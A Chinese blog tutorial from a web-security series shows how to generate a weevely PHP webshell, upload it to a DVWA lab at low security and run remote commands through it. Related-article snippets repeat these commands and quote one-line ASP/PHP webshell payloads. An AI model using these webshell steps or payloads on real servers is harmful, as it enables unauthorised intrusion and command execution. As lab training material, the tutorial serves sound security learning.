web安全/渗透测试（五）：DVWA和weevely

最新推荐文章于 2025-09-30 17:43:58 发布

原创最新推荐文章于 2025-09-30 17:43:58 发布 · 617 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#安全

web安全测试专栏收录该内容

9 篇文章

订阅专栏

本文介绍如何使用DVWA（一种易受攻击的PHP/Mysql Web应用）进行渗透测试，包括设置安全级别、利用weevely工具生成并上传shell.php，以及通过weevely与目标网站交互执行命令。

一、DVWA

是一种基于PHP/Mysql的web应用程序，容易受到攻击。

将DVWA security设置为low

账号密码默认为：admin password

DVMA模块：

二、weevely

（1）用来创建shell.php，其中密码是在步骤3使用

weevely generate [psw] [存放路径]
如：
weevely generate 123456 /root/shell.php

（2）将shell.php上传到目标网站

（3）weevely与目标网站进行交互，命令如下：

weevely [上传文件的url] [psw]
如：
weevely http://10.0.2.4/dvwa/hackable/uploads/shell.php 123456

在weevely输入命令后可在目标电脑执行，且能看到执行结果。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

蓝泽兮

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

红队内网攻防渗透：内网渗透之内网各种工具平台的使用

HACKONE的博客

04-10

1795

红队内网攻防渗透内网各种工具平台的使用内网各种工具平台的使用

web渗透之文件上传攻击

王明的博客

01-06

424

环境：server 安装DVWA 执行步骤：开源情报，被动侦查、主动侦查漏洞评估 1 在kali中使用weevely生成后门 weevely generate <连接密码> 2 使用web文件上传漏洞上传指定文件根据网页提示或者猜解内部代码过滤规则，更改后门文件，并上传。 3 使用brup代理web请求信息并更改指定文件后缀，完成指定文件上传将此处的shell.jpg更改为我们的原始文件shell.php,完成文件上传 4 连接后门文件 weevely <连接密码&

参与评论您还未登录，请先登录后发表或查看评论

安全测试8_Web安全实战1（DVWA部署）

weixin_30680385的博客

01-18

172

　1、渗透神器的打造（火狐浏览器的打造） Firebug HackBar（渗透插件） Tamper Data（抓包、截包、改包等功能） Proxy Switcher（代理设置）　　2、PHP环境安装（phpstudy下载安装即可）打开官网下载：http://www.phpstudy.net 安装路径非中文　2、DVWA安装　　（1）打开官网网址...

渗透测试Web利器篇之Weevely介绍、安装以及简单使用

lzp_5257的博客

04-20

3874

提示：文章内容仅用于渗透测试研究学习，请勿用于非法测试一、Weevely介绍 Weevely是一款使用python编写的webshell工具，集webshell生成和连接于一身，采用c/s模式构建，可以算作是linux下的一款php菜刀替代工具，具有很好的隐蔽性在linux上使用时还是很好的，集服务器错误配置审计，后门放置，暴力破解，文件管理，资源搜索，网络代理，命令执行，数据库操作，系统信息收集及端口扫描等功能下载地址：https://github.com/epinna/weevely3.

kali下的webshell工具-Weevely

weixin_30457465的博客

03-11

783

Weevely ------------------------------------------------ 主要特点： · 隐蔽的类终端的PHP webshell · 30多个管理模块 o 执行系统命令、浏览文件系统 o 检查目标服务器的常见配置错误 o 基于现有连接，创建正向、反向的TCP shell连接 o 通过目标...

【使用过程】weevely生成、上传、连接、执行…你一定行

03-31

8777

weevely傻子都会

Weevely的使用与维护

BAIXUAN9527的博客

02-28

1585

软件特点生成和管理很难检测到的PHP木马，Weevely是一个隐形的PHP网页的外壳，模拟的远程连接。这是一个Web应用程序后开发的重要工具，可用于像一个隐藏的后门，作为一个有用的远程控制台更换管理网络帐户，即使托管在免费托管服务。只是生成并上传“服务器”目标Web服务器上的PHP代码，Weevely客户端在本地运行shell命令传输。简介 weevely 属于php 的 webshell 工...

使用Weevely工具上传一句话木马

一颗小松子.的博客

01-27

3442

Weevely在上传木马进行后渗透测试的过程中可用于模拟一个类似于telnet的连接shell 通常用于web程序的漏洞利用，隐藏后门或者使用类似telnet的方式来代替web 页面式的管理 Weevely生成的服务器端php代码经过了base64编码，可以绕过主流的杀毒软件和IDS 上传服务器端代码后通常可以通过weevely直接运行使用它可以浏览文件系统，检测服务器设置，创建tcpshell和reverse shell。

安全渗透测试实践高级系列教程

Kivi的博客

11-27

2170

链接: http://pan.baidu.com/s/1gd89W6R 密码: p59m 解压密码：www.hegouvip.com 部分解压密码：dishiyiqihegoumima 课程目录： 1 BT5简介 1-1本课程内容概述(14分4秒) 2 BT5的安装及基本配置 2-1BT5及VMWare tools的安装(19分41秒) 2-2Linux常

Web渗透之一句话木马

最新发布

Strategic__的博客

09-30

844

支持PHP、JSP、ASP、ASPX等多种脚本类型，提供命令执行、文件管理、数据库操作等功能，界面简洁，操作便捷，是国内渗透测试人员常用工具。黑盒测试不依赖目标系统的源代码，仅通过模拟攻击者的实际操作，利用网站公开功能（如文件上传、数据提交、参数交互等）尝试植入或触发一句话木马，核心思路是“寻找可写入脚本代码的入口，并验证代码是否能被服务器解析执行”。asp：<%execute(request("pass"))%>（执行POST参数pass的命令）、<%evalrequest("code")%>

DVWA：该死的易受攻击的Web应用程序（DVWA）

02-05

该死的脆弱的网络应用该死的易受攻击的Web应用程序（DVWA）是该死的易受攻击PHP / MySQL Web应用程序。其主要目标是帮助安全专业人员在法律环境中测试他们的技能和工具，帮助Web开发人员更好地理解保护Web应用程序的过程，并帮助学生和教师在受控班级中学习Web应用程序安全性。房间环境。 DVWA的目的是通过简单易用的界面来实践一些最常见的Web漏洞，这些漏洞具有不同的难度。请注意，此软件同时存在已记录和未记录的漏洞。这是故意的。鼓励您尝试发现尽可能多的问题。警告！该死的漏洞Web应用程序该死的容易受攻击！请勿将其上传到托管服务提供商的公共html文件夹或任何面向

任意上传漏洞演示

03-07

讲述了任意上传漏洞以及一句话木马：

4.文件上传

zlbingo的博客

06-19

213

文件上传 1. DVWA 默认登入帐号密码 admin password DVWA 修改安全等级在DVWA Security 中选择然后submit 2. 工具 weevely 生成shell.php weevely generate 123456 /home/kali/shell.php在/home/kali/下生成shell.php文件，设置密码为123456 在DVWA中上传shell.php 远程控制 weevely http://192.168.1.104/dvwa/hackab

【渗透测试基础】文件上传

javaEE_zero的博客

12-06

572

文件上传漏洞原理

web渗透测试：文件上传漏洞

Zhongdongding的博客

04-24

455

文件上传漏洞的原因通常是应用程序没有对上传文件的类型、大小、路径等进行严格的验证和限制，攻击者可以通过伪造文件类型、修改文件后缀名等方式绕过限制，上传恶意文件到服务器。总之，为了防止文件上传漏洞，应用程序应该对上传文件的类型、大小、路径、病毒等进行严格的验证和限制。应用程序应该限制上传文件的路径，避免上传到应用程序以外的目录，从而防止攻击者上传Web Shell等恶意文件。应用程序应该对上传文件的权限进行控制，避免上传文件被其他用户访问或者修改。应用程序应该对上传文件进行病毒扫描，避免上传包含病毒的文件。

文件上传漏洞（全网最详细）

m0_59598029的博客

04-02

2020

自从学完文件上传后，寻思总结一下，但一直懒惰向后推迟，最近要准备面试了，就趁此机会写一下。文件上传漏洞是指用户上传了一个可执行的脚本文件，并通过此脚本文件获得了执行服务器端命令的能力。“文件上传”本身没有问题，有问题的是文件上传后，服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全，则会导致严重的后果。这种攻击方式是最为直接和有效的，所以我们需要思考的是如何绕过检测和过滤。

渗透测试[文件上传篇]

npc88888的博客

03-03

1834

在不同的中间件中有特殊的情况，如果在 apache 可以开启 application/x-httpd-php 在 AddType application/x-httpd-php .php .phtml .php3 后缀名为 phtml 、php3 均被解析成 php 有的 apache 版本默认就会开启。把恶意文件改成 js 允许上传的文件后缀，如 jpg、gif、png 等，再通过抓包工具抓取 post 的数据包，把后缀名改成可执行的脚本后缀如 php 、asp、jsp、 net 等。

Weevely工具上传一句话木马

line

08-03

1505

漏洞原理：Weevely在上传木马进行后渗透测试的过程中可用于模拟一个类似于telnet的连接shell，通常用于web程序的漏洞利用，隐藏后门或者使用类似telnet的方式来代替web 页面式的管理，weevely生成的服务器端php代码经过了base64编码，可以绕过主流的杀毒软件和IDS，上传服务器端代码后通常可以通过weevely直接运行。6.上传后在靶机服务器上重新扫描扫描结果如下，还是只检测到shell.php而hello.php并未检测出为。实验环境：kali；8.输入任意键回车后进入终端。.

渗透测试CISP-PTE：文件上传

未知2066的博客

02-29

1663

文件上传漏洞是一种常见的安全漏洞，指的是攻击者可以通过上传恶意文件来执行任意代码或获取系统权限。这种漏洞通常出现在Web应用程序中，攻击者利用漏洞可以上传包含恶意代码的文件，然后通过访问该文件来执行攻击。

深入理解渗透测试：DVWA网络安全实践指南

DVWA（Damn Vulnerable Web Application）是一个故意设计的不安全的Web应用，它被用于安全研究、教育和渗透测试练习。DVWA提供了学习和实践渗透测试技术的平台，用户可以在这里学习网络攻击的基本技术，包括SQL注入...